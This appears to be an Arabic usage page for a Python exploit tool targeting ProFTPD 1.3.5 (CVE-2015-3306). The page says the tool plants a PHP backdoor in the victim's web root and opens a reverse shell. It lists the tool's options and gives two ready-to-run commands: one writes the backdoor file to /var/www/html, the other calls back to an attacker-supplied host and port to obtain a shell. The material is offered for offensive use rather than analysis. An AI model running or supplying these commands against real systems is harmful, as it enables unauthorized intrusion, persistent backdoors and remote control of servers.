
استغلال لـ ProFTPD 1.3.5 CVE-2015-3306 يكتب بابًا خلفيًا بلغة PHP في جذر الويب الخاص بالهدف ويطلق قشرة عكسية لتنفيذ الأوامر عن بُعد.
ProFTPd 1.3.5 RCE
الاستخدام: ProFTPD.py [options]
الخيارات:
-h, --help عرض رسالة المساعدة هذه والخروج
-l LHOST, --lhost=LHOST
عنوان IP المحلي مطلوب للـ Reverse Shell،
-p LPORT, --lport=LPORT
المنفذ مطلوب للـ Reverse Shell،
-t TARGET, --target=TARGET
الهدف المعرض للثغرة،
-d DIRECTORY, --dir=DIRECTORY
دليل WebRoot لرفع الباب الخلفي، الافتراضي: /var/www/html
-c COMMAND, --command=COMMAND
أمر النظام،
-f FILE, --file=FILE
اسم الباب الخلفي، الافتراضي: shell.php.
الخطوة 1 - كتابة الباب الخلفي إلى الجهاز الهدف!
Usage: python3 exploit.py -t 10.x.x.x -f cmd.php -d '/var/www/html'
الخطوة 2 - الحصول على شل!!
Usage: python3 exploit.py -t 10.x.x.x --lhost 172.x.x.x --lport 4242